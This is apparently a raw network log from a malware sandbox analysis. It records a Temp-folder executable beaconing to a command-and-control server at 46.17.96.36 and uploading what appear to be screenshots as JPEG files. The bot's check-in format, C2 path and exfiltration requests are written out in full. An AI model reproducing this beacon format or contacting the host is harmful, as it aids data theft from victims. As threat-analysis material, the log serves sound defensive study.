                                        Aug 29, 2021 22:27:49.982557058 CEST10420OUTData Raw: 98 87 52 e6 99 9a 5a 02 c3 a8 a4 a2 81 0f 1d 69 7a 53 05 2e 6a 84 38 1a 5c d3 41 a3 34 5c 56 17 34 b9 a6 d2 d3 01 45 2d 34 53 a8 13 14 52 d3 69 45 34 21 69 c2 9b 4e 15 44 b1 d4 66 92 8a 62 1d 4a 29 b4 e0 69 88 75 2d 36 94 1a a4 48 fa 5a 68 34 e1
                                        Data Ascii: RZizS.j8\A4\V4E-4SRiE4!iNDfbJ)iu-6HZh4TKNKU"GNi"J*,5iA6PifQN;L8w&f8%TMSA"L4)i2l:fF.$q4fyI]}wSro4n'J_u...R
                                        Aug 29, 2021 22:27:50.015902996 CEST10438OUTData Raw: 62 c0 80 01 e3 9e 38 ce 6d c2 5a b6 5a 53 8e 88 f5 2b 4f 8f f6 76 31 b4 76 7e 0b 86 dd 19 b7 b2 c3 78 10 16 f5 20 45 d7 81 f9 55 8f f8 68 c1 ff 00 42 af fe 54 3f fb 5d 79 14 5e 1b b8 b8 bb d3 61 b4 bc b3 b9 8f 50 b8 7b 78 67 42 ea 81 94 ae e2 db
                                        Data Ascii: b8mZZS+Ov1v~x EUhBT?]y^aP{xgB00l,nr#&L`&>RGk_:g#^O-d>f+yc8L.no?6OO1d&<"B\@9'q"\Sw
                                        Aug 29, 2021 22:27:50.082567930 CEST10439INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:50 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        118192.168.2.44985646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:50.132224083 CEST10439OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:50.208998919 CEST10440INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:50 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:27:50.297775984 CEST10440OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:50.297894001 CEST10440OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:50.298094988 CEST10450OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:50.298213005 CEST10453OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:50.330671072 CEST10461OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:50.330732107 CEST10464OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:50.330741882 CEST10467OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:50.330971003 CEST10480OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:50.363307953 CEST10483OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:27:50.363380909 CEST10486OUTData Raw: b8 d2 ef de 58 82 ee 31 be 57 e6 50 dc 65 c1 e8 47 6a e5 a7 56 a5 57 cb 08 dd 9b d4 a7 4e 92 e6 9c ac 8f 9f bf b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a 3f b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a f7 33 e2 1f 03 8e ba 4e a7 f9 8f fe 39 5b fa 35 9f 85
                                        Data Ascii: X1WPeGjVWN?]??]3N9[5u5&0`G^y")%6cZXeVh9:GktFdmvs0~^H xY3.Y]Z*9WAQE(>o&Q\bdg)z{WU
                                        Aug 29, 2021 22:27:50.363557100 CEST10494OUTData Raw: bd cd ae 3c d4 1d b3 fc fd fd 2b e7 40 4a b0 65 24 10 72 08 ed 5b e9 e2 5b 88 35 7b 4d 72 16 ff 00 4e 55 09 72 bd 04 d8 00 64 ff 00 bc 3a fb 8c f7 15 d7 88 ca 60 dd e9 e9 a7 e3 ff 00 07 f3 38 f0 f9 b4 d2 b5 4d 75 fc 3f e0 7e 47 4b f1 0b fe 48 b6
                                        Data Ascii: <+@Je$r[[5{MrNUrd:`8Mu?~GKH^k~!+kgu]1R4(R){RR-wZbaKIJ(ZJ)8S%p!mpm:ZAKTH)i)E4KO)T`ii-PpA"
                                        Aug 29, 2021 22:27:50.463830948 CEST10549INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:50 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        119192.168.2.44985746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:50.362004995 CEST10480OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:50.442497969 CEST10549INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:50 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        12192.168.2.44974746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:13.957889080 CEST2312OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:13.958050013 CEST2313OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:13.958271980 CEST2323OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:13.958479881 CEST2325OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:13.990216970 CEST2331OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:13.990286112 CEST2339OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:13.990497112 CEST2351OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:14.022502899 CEST2354OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:14.022556067 CEST2367OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:14.022603989 CEST2381OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:14.022629023 CEST2382OUTData Raw: 97 a6 cd 2d b4 c6 41 3c 53 ef 94 8b 89 00 62 62 89 c1 e0 01 c9 cf 1e 95 bd 3e 97 65 71 e2 4f 12 c7 fd 93 09 87 46 bf 92 e2 d5 21 89 11 6e 48 56 3f 66 3d 32 30 9b c0 19 c2 ab 80 3e 61 44 ab c6 3f 8f e0 ec 25 46 4c f3 8a 2b a5 ba d5 1b 43 d3 f4 76
                                        Data Ascii: -A<Sbb>eqOF!nHV?f=20>aD?%FL+Cv\scc4Z_&0NI:]3K;XJXedFbr260NICnV:K"<f6G*Pk|5F.'fa-I~od#ywsin4;
                                        Aug 29, 2021 22:27:14.125421047 CEST2420INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:14 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        120192.168.2.44985846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:50.600866079 CEST10550OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:50.669899940 CEST10550INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:50 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        121192.168.2.44985946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:50.698928118 CEST10551OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:50.699043989 CEST10551OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:50.699224949 CEST10561OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:50.699326992 CEST10563OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:50.734647036 CEST10569OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:50.735151052 CEST10584OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:50.735191107 CEST10589OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:50.770396948 CEST10594OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:50.770487070 CEST10597OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:50.770509958 CEST10600OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:27:50.770912886 CEST10608OUTData Raw: 1c a2 16 0a 36 95 e0 48 07 5a bf 79 7f a3 c5 e3 ab fd 76 2d 6e d2 e2 d6 f0 de 6d 48 a1 9c 48 9e 64 12 2a ee 0d 18 1c b3 01 c1 3d 7d 39 a7 ed ea 59 bb 7f 37 e1 b0 4a 85 3b d9 3e a6 24 1a 3c af 15 ec b7 57 16 f6 29 63 70 96 d7 26 e3 7f ee dd b7 e3
                                        Data Ascii: 6HZyv-nmHHd*=}9Y7J;>$<W)cp&V$,Wn|/,76yqs*d$v5U]r;eex+\kl)BD]:'h<7 I\KYhqOU2}.KqcMp4M*R6v6
                                        Aug 29, 2021 22:27:50.877263069 CEST10659INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:50 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        122192.168.2.44986046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:50.851327896 CEST10659OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:50.922791958 CEST10659INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:50 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
